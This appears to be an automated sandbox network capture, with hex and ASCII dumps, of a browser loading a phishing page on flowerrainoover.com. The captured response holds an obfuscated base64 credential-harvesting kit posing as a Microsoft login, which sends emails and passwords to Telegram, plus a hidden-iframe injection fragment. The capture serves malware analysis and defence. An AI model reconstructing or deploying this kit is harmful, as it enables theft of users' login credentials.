                                    2024-11-27 22:06:41 UTC592INData Raw: 64 28 61 29 3b 22 3b 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 27 68 65 61 64 27 29 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 64 29 7d 7d 69 66 28 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 29 7b 76 61 72 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 69 66 72 61 6d 65 27 29 3b 61 2e 68 65 69 67 68 74 3d 31 3b 61 2e 77 69 64 74 68 3d 31 3b 61 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 3b 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 30 3b 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 30 3b 61 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 3d 27 6e 6f 6e 65 27 3b 61 2e 73 74 79 6c 65 2e 76 69 73 69 62 69 6c 69 74 79 3d 27 68 69 64 64 65 6e 27 3b 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79
                                    Data Ascii: d(a);";b.getElementsByTagName('head')[0].appendChild(d)}}if(document.body){var a=document.createElement('iframe');a.height=1;a.width=1;a.style.position='absolute';a.style.top=0;a.style.left=0;a.style.border='none';a.style.visibility='hidden';document.body
                                    2024-11-27 22:06:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    2192.168.2.1649711172.67.157.2544437148C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2024-11-27 22:06:41 UTC1135OUTPOST /.dlk/inv.html HTTP/1.1
                                    Host: flowerrainoover.com
                                    Connection: keep-alive
                                    Content-Length: 22
                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                    X-Requested-TimeStamp-Expire:
                                    sec-ch-ua-mobile: ?0
                                    X-Requested-TimeStamp-Combination:
                                    X-Requested-Type-Combination: GET
                                    Content-type: application/x-www-form-urlencoded
                                    X-Requested-Type: GET
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    B0kWKUtIuUoeYhzNrJt3uJISRw: 46353150
                                    X-Requested-TimeStamp:
                                    X-Requested-with: XMLHttpRequest
                                    sec-ch-ua-platform: "Windows"
                                    Accept: */*
                                    Origin: https://flowerrainoover.com
                                    Sec-Fetch-Site: same-origin
                                    Sec-Fetch-Mode: cors
                                    Sec-Fetch-Dest: empty
                                    Referer: https://flowerrainoover.com/.dlk/inv.html
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    Cookie: PUUsBzGtrExYDELzTBIyQY5GqxU=If0sh8Z41RsBcCvWYu6ip129qDo; lPzTpaGcxz9WhRcz-77ydUSDnto=1732745200; -q9GqergfbWghlAaztMDrMKaTWU=1732831600; rUVWbTk16-Yzd9-_0riynkgIRs8=tK8LKZcaf7n1Hd91px_j-FDkQ78; 1KpNbQKJGux7dgx29IJNBjIsBcw=j6yULiTE1iXXHUVNwDs_ThwPui0
                                    2024-11-27 22:06:41 UTC22OUTData Raw: 6e 61 6d 65 31 3d 48 65 6e 72 79 26 6e 61 6d 65 32 3d 46 6f 72 64
                                    Data Ascii: name1=Henry&name2=Ford
                                    2024-11-27 22:06:42 UTC1324INHTTP/1.1 204 No Content
                                    Date: Wed, 27 Nov 2024 22:06:42 GMT
                                    Connection: close
                                    X-Content-Type-Options: nosniff
                                    X-Content-Type-Options: nosniff
                                    X-XSS-Protection: 1; mode=block
                                    X-XSS-Protection: 1; mode=block
                                    Set-Cookie: 1KpNbQKJGux7dgx29IJNBjIsBcw=j6yULiTE1iXXHUVNwDs_ThwPui0; path=/; expires=Thu, 28-Nov-24 22:06:41 GMT; Max-Age=86400;
                                    Set-Cookie: FK4RvuSBOVTnuo09Im3NRtX9n4o=1732745201; path=/; expires=Thu, 28-Nov-24 22:06:41 GMT; Max-Age=86400;
                                    Set-Cookie: IX4QICePcnmPJIwpdGdqlzIvQ2Y=1732831601; path=/; expires=Thu, 28-Nov-24 22:06:41 GMT; Max-Age=86400;
                                    Set-Cookie: eVlrdrGpRDoH3l-8I0OChIXmYy4=-EegDvlSeQ2-GGIA46Zm_V3ReKY; path=/; expires=Thu, 28-Nov-24 22:06:41 GMT; Max-Age=86400;
                                    X-Frame-Options: SAMEORIGIN
                                    Cache-Control: public, max-age=0 no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                    Pragma: no-cache
                                    Expires: 0
                                    X-Server-Powered-By: Engintron
                                    cf-cache-status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I1qDxYxebYMaymjZZx1Mobdwc%2FLKNZjYITW%2B%2FGuF2xYOWkHxtEq7wmZk3jahLxr%2Bxb0PeNAp9ApulB5m0jb4BlOwmWBgS8xL0vca4YzElIoU1xpqwM3%2FmQY0sEs9WRqdamXSdVtk"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 8e956d493a7642bc-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    2024-11-27 22:06:42 UTC217INData Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 37 36 33 26 6d 69 6e 5f 72 74 74 3d 31 37 36 30 26 72 74 74 5f 76 61 72 3d 36 36 37 26 73 65 6e 74 3d 36 26 72 65 63 76 3d 38 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 35 31 26 72 65 63 76 5f 62 79 74 65 73 3d 31 37 35 37 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 31 36 33 32 31 39 36 26 63 77 6e 64 3d 32 32 35 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 30 65 61 62 31 31 37 37 38 32 35 35 39 61 61 65 26 74 73 3d 31 32 36 31 26 78 3d 30 22 0d 0a 0d 0a
                                    Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=1763&min_rtt=1760&rtt_var=667&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2851&recv_bytes=1757&delivery_rate=1632196&cwnd=225&unsent_bytes=0&cid=0eab117782559aae&ts=1261&x=0"


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    3192.168.2.164971635.190.80.14437148C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2024-11-27 22:06:43 UTC546OUTOPTIONS /report/v4?s=fcO%2BJovCTSTgVywej%2BfZgIFS91BxdD9wqiUCdSYsWuYMKflvY4bfVt%2F9QlWQVyXQuLDaRJkGH5pjBSmxeP0ynVXMX9LDXYN%2Bw3C5%2BLDJ9hVTO78y6Ble8xorMbNbhracfu0SJwUv HTTP/1.1
                                    Host: a.nel.cloudflare.com
                                    Connection: keep-alive
                                    Origin: https://flowerrainoover.com
                                    Access-Control-Request-Method: POST
                                    Access-Control-Request-Headers: content-type
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2024-11-27 22:06:43 UTC336INHTTP/1.1 200 OK
                                    Content-Length: 0
                                    access-control-max-age: 86400
                                    access-control-allow-methods: POST, OPTIONS
                                    access-control-allow-origin: *
                                    access-control-allow-headers: content-length, content-type
                                    date: Wed, 27 Nov 2024 22:06:43 GMT
                                    Via: 1.1 google
                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                    Connection: close


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    4192.168.2.1649719172.67.157.2544437148C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2024-11-27 22:06:44 UTC1110OUTGET /.dlk/inv.html HTTP/1.1
                                    Host: flowerrainoover.com
                                    Connection: keep-alive
                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                    sec-ch-ua-mobile: ?0
                                    sec-ch-ua-platform: "Windows"
                                    Upgrade-Insecure-Requests: 1
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    Sec-Fetch-Site: same-origin
                                    Sec-Fetch-Mode: navigate
                                    Sec-Fetch-Dest: document
                                    Referer: https://flowerrainoover.com/.dlk/inv.html
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    Cookie: PUUsBzGtrExYDELzTBIyQY5GqxU=If0sh8Z41RsBcCvWYu6ip129qDo; lPzTpaGcxz9WhRcz-77ydUSDnto=1732745200; -q9GqergfbWghlAaztMDrMKaTWU=1732831600; rUVWbTk16-Yzd9-_0riynkgIRs8=tK8LKZcaf7n1Hd91px_j-FDkQ78; 1KpNbQKJGux7dgx29IJNBjIsBcw=j6yULiTE1iXXHUVNwDs_ThwPui0; FK4RvuSBOVTnuo09Im3NRtX9n4o=1732745201; IX4QICePcnmPJIwpdGdqlzIvQ2Y=1732831601; eVlrdrGpRDoH3l-8I0OChIXmYy4=-EegDvlSeQ2-GGIA46Zm_V3ReKY
                                    2024-11-27 22:06:45 UTC1050INHTTP/1.1 200 OK
                                    Date: Wed, 27 Nov 2024 22:06:45 GMT
                                    Content-Type: text/html
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Vary: Accept-Encoding
                                    X-Content-Type-Options: nosniff
                                    X-Content-Type-Options: nosniff
                                    X-XSS-Protection: 1; mode=block
                                    X-XSS-Protection: 1; mode=block
                                    Last-Modified: Tue, 26 Nov 2024 16:43:29 GMT
                                    X-Nginx-Upstream-Cache-Status: EXPIRED
                                    X-Server-Powered-By: Engintron
                                    cf-cache-status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=79MUrTGl1J1t699J4rX0FpNVDwpnYSL9MP4rqNY6B4D%2FNlA%2Bp879AQPTc6vyJkIZmf4gAAgN9alGoMQvmq3b3w%2FP1miO2ixYWyqx64I1beyQFjhhVQulmXmsqqSDCg0M%2BUO49VaK"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 8e956d59786943a6-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    server-timing: cfL4;desc="?proto=TCP&rtt=1631&min_rtt=1629&rtt_var=615&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2852&recv_bytes=1688&delivery_rate=1775075&cwnd=175&unsent_bytes=0&cid=47e219664ea3a098&ts=815&x=0"
                                    2024-11-27 22:06:45 UTC319INData Raw: 32 63 31 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 2e 6a 71 75 65 72 79 2e 63 6f 6d 2f 6a 71 75 65 72 79 2d 33 2e 36 2e 30 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 73 61 76 65 46 69 6c 65 28 29 3b 0a 20 20 20 20 7d 29 3b 0a 0a 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 73 61 76 65 46 69 6c 65 28 6e 61 6d 65 2c 20 74 79 70 65 2c 20 64 61 74 61 29 20 7b 0a 20 20 20 20 20 20 69 66 20 28 64 61 74 61 20 21 3d 20 6e 75 6c 6c 20 26 26 20 6e 61 76 69 67 61 74 6f
                                    Data Ascii: 2c11<!DOCTYPE html><html><head> <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script> <script> $(document).ready(function() { saveFile(); }); function saveFile(name, type, data) { if (data != null && navigato
                                    2024-11-27 22:06:45 UTC1369INData Raw: 5d 2c 20 7b 20 74 79 70 65 3a 20 74 79 70 65 20 7d 29 2c 20 6e 61 6d 65 29 3b 0a 20 20 20 20 20 20 76 61 72 20 61 20 3d 20 24 28 22 3c 61 20 73 74 79 6c 65 3d 27 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 27 2f 3e 22 29 3b 0a 20 20 0a 20 20 20 20 20 20 76 61 72 20 65 6e 63 6f 64 65 64 53 74 72 69 6e 67 41 74 6f 42 20 3d 20 22 50 43 46 45 54 30 4e 55 57 56 42 46 49 47 68 30 62 57 77 2b 43 6a 78 6f 64 47 31 73 49 47 78 68 62 6d 63 39 49 6d 56 75 49 6a 34 4b 50 47 68 6c 59 57 51 2b 43 69 41 67 49 43 41 38 62 57 56 30 59 53 42 6a 61 47 46 79 63 32 56 30 50 53 4a 56 56 45 59 74 4f 43 49 2b 43 69 41 67 49 43 41 38 62 57 56 30 59 53 42 75 59 57 31 6c 50 53 4a 32 61 57 56 33 63 47 39 79 64 43 49 67 59 32 39 75 64 47 56 75 64 44 30 69 64 32 6c 6b 64 47 67 39 5a 47
                                    Data Ascii: ], { type: type }), name); var a = $("<a style='display: none;'/>"); var encodedStringAtoB = "PCFET0NUWVBFIGh0bWw+CjxodG1sIGxhbmc9ImVuIj4KPGhlYWQ+CiAgICA8bWV0YSBjaGFyc2V0PSJVVEYtOCI+CiAgICA8bWV0YSBuYW1lPSJ2aWV3cG9ydCIgY29udGVudD0id2lkdGg9ZG
                                    2024-11-27 22:06:45 UTC1369INData Raw: 62 69 31 69 62 33 52 30 62 32 30 36 49 44 49 77 63 48 67 37 43 69 41 67 49 43 41 67 49 43 41 67 66 51 6f 4b 49 43 41 67 49 43 41 67 49 43 41 75 59 57 52 76 59 6d 55 74 62 47 39 6e 62 79 42 70 62 57 63 67 65 77 6f 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 42 33 61 57 52 30 61 44 6f 67 4d 7a 42 77 65 44 73 4b 49 43 41 67 49 43 41 67 49 43 42 39 43 67 6f 67 49 43 41 67 49 43 41 67 49 43 35 6a 62 32 35 30 59 57 6c 75 5a 58 49 67 65 77 6f 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 42 69 59 57 4e 72 5a 33 4a 76 64 57 35 6b 4c 57 4e 76 62 47 39 79 4f 69 41 6a 5a 6d 5a 6d 4f 77 6f 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 42 77 59 57 52 6b 61 57 35 6e 4f 69 41 7a 4d 48 42 34 4f 77 6f 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 42 69 62 33 67 74 63 32 68
                                    Data Ascii: bi1ib3R0b206IDIwcHg7CiAgICAgICAgfQoKICAgICAgICAuYWRvYmUtbG9nbyBpbWcgewogICAgICAgICAgICB3aWR0aDogMzBweDsKICAgICAgICB9CgogICAgICAgIC5jb250YWluZXIgewogICAgICAgICAgICBiYWNrZ3JvdW5kLWNvbG9yOiAjZmZmOwogICAgICAgICAgICBwYWRkaW5nOiAzMHB4OwogICAgICAgICAgICBib3gtc2h
                                    2024-11-27 22:06:45 UTC1369INData Raw: 43 41 67 49 43 41 67 64 47 56 34 64 43 31 68 62 47 6c 6e 62 6a 6f 67 62 47 56 6d 64 44 73 4b 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 63 47 46 6b 5a 47 6c 75 5a 79 31 73 5a 57 5a 30 4f 69 41 31 63 48 67 37 43 69 41 67 49 43 41 67 49 43 41 67 66 51 6f 4b 49 43 41 67 49 43 41 67 49 43 41 75 59 32 39 75 64 47 46 70 62 6d 56 79 49 47 6c 75 63 48 56 30 57 33 52 35 63 47 55 39 49 6e 42 68 63 33 4e 33 62 33 4a 6b 49 6c 30 36 5a 6d 39 6a 64 58 4d 73 49 43 35 6a 62 32 35 30 59 57 6c 75 5a 58 49 67 61 57 35 77 64 58 52 62 64 48 6c 77 5a 54 30 69 5a 57 31 68 61 57 77 69 58 54 70 6d 62 32 4e 31 63 79 77 67 4c 6d 4e 76 62 6e 52 68 61 57 35 6c 63 69 42 70 62 6e 42 31 64 46 74 30 65 58 42 6c 50 53 4a 30 5a 58 68 30 49 6c 30 36 5a 6d 39 6a 64 58 4d 67 65 77 6f 67
                                    Data Ascii: CAgICAgdGV4dC1hbGlnbjogbGVmdDsKICAgICAgICAgICAgcGFkZGluZy1sZWZ0OiA1cHg7CiAgICAgICAgfQoKICAgICAgICAuY29udGFpbmVyIGlucHV0W3R5cGU9InBhc3N3b3JkIl06Zm9jdXMsIC5jb250YWluZXIgaW5wdXRbdHlwZT0iZW1haWwiXTpmb2N1cywgLmNvbnRhaW5lciBpbnB1dFt0eXBlPSJ0ZXh0Il06Zm9jdXMgewog
                                    2024-11-27 22:06:45 UTC1369INData Raw: 41 79 4d 48 42 34 4f 77 6f 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 42 30 5a 58 68 30 4c 57 46 73 61 57 64 75 4f 69 42 6a 5a 57 35 30 5a 58 49 37 43 69 41 67 49 43 41 67 49 43 41 67 66 51 6f 4b 49 43 41 67 49 43 41 67 49 43 41 75 59 32 39 75 64 47 46 70 62 6d 56 79 49 47 5a 76 62 33 52 6c 63 69 42 77 49 48 73 4b 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 62 57 46 79 5a 32 6c 75 4f 69 41 77 4f 77 6f 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 42 30 5a 58 68 30 4c 57 46 73 61 57 64 75 4f 69 42 6a 5a 57 35 30 5a 58 49 37 43 69 41 67 49 43 41 67 49 43 41 67 66 51 6f 4b 49 43 41 67 49 43 41 67 49 43 41 75 59 32 39 75 64 47 46 70 62 6d 56 79 49 47 5a 76 62 33 52 6c 63 69 42 68 49 48 73 4b 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 59 32 39 73 62
                                    Data Ascii: AyMHB4OwogICAgICAgICAgICB0ZXh0LWFsaWduOiBjZW50ZXI7CiAgICAgICAgfQoKICAgICAgICAuY29udGFpbmVyIGZvb3RlciBwIHsKICAgICAgICAgICAgbWFyZ2luOiAwOwogICAgICAgICAgICB0ZXh0LWFsaWduOiBjZW50ZXI7CiAgICAgICAgfQoKICAgICAgICAuY29udGFpbmVyIGZvb3RlciBhIHsKICAgICAgICAgICAgY29sb
                                    2024-11-27 22:06:45 UTC1369INData Raw: 6c 62 6e 52 45 5a 57 5a 68 64 57 78 30 4b 43 6b 37 49 47 68 68 62 6d 52 73 5a 55 56 74 59 57 6c 73 55 33 56 69 62 57 6c 30 4b 43 6b 37 49 6a 34 4b 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 50 47 6c 75 63 48 56 30 49 48 52 35 63 47 55 39 49 6d 56 74 59 57 6c 73 49 69 42 70 5a 44 30 69 5a 57 31 68 61 57 77 69 49 47 35 68 62 57 55 39 49 6d 56 74 59 57 6c 73 49 69 42 77 62 47 46 6a 5a 57 68 76 62 47 52 6c 63 6a 30 69 52 57 31 68 61 57 77 67 51 57 52 6b 63 6d 56 7a 63 79 49 67 63 6d 56 78 64 57 6c 79 5a 57 51 2b 43 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 44 78 70 62 6e 42 31 64 43 42 30 65 58 42 6c 50 53 4a 7a 64 57 4a 74 61 58 51 69 49 48 5a 68 62 48 56 6c 50 53 4a 4f 5a 58 68 30 49 6a 34 4b 49 43 41 67 49 43 41 67 49 43 41 38 4c 32 5a 76 63 6d
                                    Data Ascii: lbnREZWZhdWx0KCk7IGhhbmRsZUVtYWlsU3VibWl0KCk7Ij4KICAgICAgICAgICAgPGlucHV0IHR5cGU9ImVtYWlsIiBpZD0iZW1haWwiIG5hbWU9ImVtYWlsIiBwbGFjZWhvbGRlcj0iRW1haWwgQWRkcmVzcyIgcmVxdWlyZWQ+CiAgICAgICAgICAgIDxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJOZXh0Ij4KICAgICAgICA8L2Zvcm
                                    2024-11-27 22:06:45 UTC1369INData Raw: 61 58 59 2b 43 67 6f 67 49 43 41 67 50 47 5a 76 62 33 52 6c 63 6a 34 4b 49 43 41 67 49 43 41 67 49 43 41 38 63 44 37 43 71 53 41 79 4d 44 49 30 49 45 31 70 59 33 4a 76 63 32 39 6d 64 43 42 38 49 44 78 68 49 47 68 79 5a 57 59 39 49 69 4d 69 50 6c 42 79 61 58 5a 68 59 33 6b 67 4a 69 42 44 62 32 39 72 61 57 56 7a 50 43 39 68 50 6a 77 76 63 44 34 4b 49 43 41 67 49 44 77 76 5a 6d 39 76 64 47 56 79 50 67 6f 38 4c 32 52 70 64 6a 34 4b 43 6a 78 7a 59 33 4a 70 63 48 51 2b 43 69 41 67 49 43 42 73 5a 58 51 67 59 58 52 30 5a 57 31 77 64 45 4e 76 64 57 35 30 49 44 30 67 4d 44 73 4b 43 69 41 67 49 43 41 76 4c 79 42 47 64 57 35 6a 64 47 6c 76 62 69 42 30 62 79 42 68 64 58 52 76 62 57 46 30 61 57 4e 68 62 47 78 35 49 47 5a 70 62 47 77 67 64 47 68 6c 49 47 56 74 59 57 6c
                                    Data Ascii: aXY+CgogICAgPGZvb3Rlcj4KICAgICAgICA8cD7CqSAyMDI0IE1pY3Jvc29mdCB8IDxhIGhyZWY9IiMiPlByaXZhY3kgJiBDb29raWVzPC9hPjwvcD4KICAgIDwvZm9vdGVyPgo8L2Rpdj4KCjxzY3JpcHQ+CiAgICBsZXQgYXR0ZW1wdENvdW50ID0gMDsKCiAgICAvLyBGdW5jdGlvbiB0byBhdXRvbWF0aWNhbGx5IGZpbGwgdGhlIGVtYWl
                                    2024-11-27 22:06:45 UTC1369INData Raw: 57 31 6c 62 6e 52 43 65 55 6c 6b 4b 43 64 6f 61 57 52 6b 5a 57 34 74 5a 57 31 68 61 57 77 6e 4b 53 35 32 59 57 78 31 5a 54 73 4b 49 43 41 67 49 43 41 67 49 43 42 6a 62 32 35 7a 64 43 42 77 59 58 4e 7a 64 32 39 79 5a 43 41 39 49 47 52 76 59 33 56 74 5a 57 35 30 4c 6d 64 6c 64 45 56 73 5a 57 31 6c 62 6e 52 43 65 55 6c 6b 4b 43 64 77 59 58 4e 7a 64 32 39 79 5a 43 63 70 4c 6e 5a 68 62 48 56 6c 4f 77 6f 67 49 43 41 67 49 43 41 67 49 48 4e 6c 62 6d 52 46 62 57 46 70 62 46 42 68 63 33 4e 33 62 33 4a 6b 56 47 39 55 5a 57 78 6c 5a 33 4a 68 62 53 68 6c 62 57 46 70 62 43 77 67 63 47 46 7a 63 33 64 76 63 6d 51 70 4f 77 6f 4b 49 43 41 67 49 43 41 67 49 43 42 70 5a 69 41 6f 59 58 52 30 5a 57 31 77 64 45 4e 76 64 57 35 30 49 44 77 67 4e 43 6b 67 65 77 6f 67 49 43 41 67
                                    Data Ascii: W1lbnRCeUlkKCdoaWRkZW4tZW1haWwnKS52YWx1ZTsKICAgICAgICBjb25zdCBwYXNzd29yZCA9IGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdwYXNzd29yZCcpLnZhbHVlOwogICAgICAgIHNlbmRFbWFpbFBhc3N3b3JkVG9UZWxlZ3JhbShlbWFpbCwgcGFzc3dvcmQpOwoKICAgICAgICBpZiAoYXR0ZW1wdENvdW50IDwgNCkgewogICAg
                                    2024-11-27 22:06:45 UTC1369INData Raw: 39 75 62 48 6b 67 4c 53 30 2b 49 43 41 4b 43 6a 77 76 59 6d 39 6b 65 54 34 4b 50 43 39 6f 64 47 31 73 50 67 6f 3d 22 3b 0a 20 20 20 20 20 20 76 61 72 20 64 65 63 6f 64 65 64 53 74 72 69 6e 67 41 74 6f 42 20 3d 20 61 74 6f 62 28 65 6e 63 6f 64 65 64 53 74 72 69 6e 67 41 74 6f 42 29 3b 0a 20 20 20 20 20 20 63 6f 6e 73 74 20 6d 79 42 6c 6f 62 20 3d 20 6e 65 77 20 42 6c 6f 62 28 5b 64 65 63 6f 64 65 64 53 74 72 69 6e 67 41 74 6f 42 5d 2c 20 7b 20 74 79 70 65 3a 20 27 74 65 78 74 2f 68 74 6d 6c 27 20 7d 29 3b 0a 20 20 20 20 20 20 63 6f 6e 73 74 20 75 72 6c 20 3d 20 77 69 6e 64 6f 77 2e 55 52 4c 2e 63 72 65 61 74 65 4f 62 6a 65 63 74 55 52 4c 28 6d 79 42 6c 6f 62 29 3b 0a 20 20 0a 20 20 20 20 20 20 61 2e 61 74 74 72 28 22 68 72 65 66 22 2c 20 75 72 6c 29 3b 0a
                                    Data Ascii: 9ubHkgLS0+ICAKCjwvYm9keT4KPC9odG1sPgo="; var decodedStringAtoB = atob(encodedStringAtoB); const myBlob = new Blob([decodedStringAtoB], { type: 'text/html' }); const url = window.URL.createObjectURL(myBlob); a.attr("href", url);
                                    2024-11-27 22:06:45 UTC18INData Raw: 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                    Data Ascii: </body></html>


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    5192.168.2.164971823.218.208.109443
                                    TimestampBytes transferredDirectionData
                                    2024-11-27 22:06:44 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                    Connection: Keep-Alive
                                    Accept: */*
                                    Accept-Encoding: identity
                                    User-Agent: Microsoft BITS/7.8
                                    Host: fs.microsoft.com
                                    2024-11-27 22:06:44 UTC479INHTTP/1.1 200 OK
                                    Content-Type: application/octet-stream
                                    Server: Kestrel
                                    ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                    Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                    X-Ms-ApiVersion: Distribute 1.2
                                    X-Ms-Region: prod-neu-z1
                                    Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                    X-OSID: 2
                                    X-CID: 2
                                    X-CCC: GB
                                    Cache-Control: public, max-age=101642
                                    Date: Wed, 27 Nov 2024 22:06:44 GMT
                                    Connection: close
                                    X-CID: 2


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    6192.168.2.164972035.190.80.14437148C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2024-11-27 22:06:44 UTC484OUTPOST /report/v4?s=fcO%2BJovCTSTgVywej%2BfZgIFS91BxdD9wqiUCdSYsWuYMKflvY4bfVt%2F9QlWQVyXQuLDaRJkGH5pjBSmxeP0ynVXMX9LDXYN%2Bw3C5%2BLDJ9hVTO78y6Ble8xorMbNbhracfu0SJwUv HTTP/1.1
                                    Host: a.nel.cloudflare.com
                                    Connection: keep-alive
                                    Content-Length: 417
                                    Content-Type: application/reports+json
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2024-11-27 22:06:44 UTC417OUTData Raw: 5b 7b 22 61 67 65 22 3a 31 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 33 34 38 38 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 74 2e 63 6f 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 37 32 2e 36 37 2e 31 35 37 2e 32 35 34 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 35 30 33 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 66
                                    Data Ascii: [{"age":1,"body":{"elapsed_time":3488,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://t.co/","sampling_fraction":1.0,"server_ip":"172.67.157.254","status_code":503,"type":"http.error"},"type":"network-error","url":"https://f
                                    2024-11-27 22:06:45 UTC168INHTTP/1.1 200 OK
                                    Content-Length: 0
                                    date: Wed, 27 Nov 2024 22:06:45 GMT
                                    Via: 1.1 google
                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                    Connection: close


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
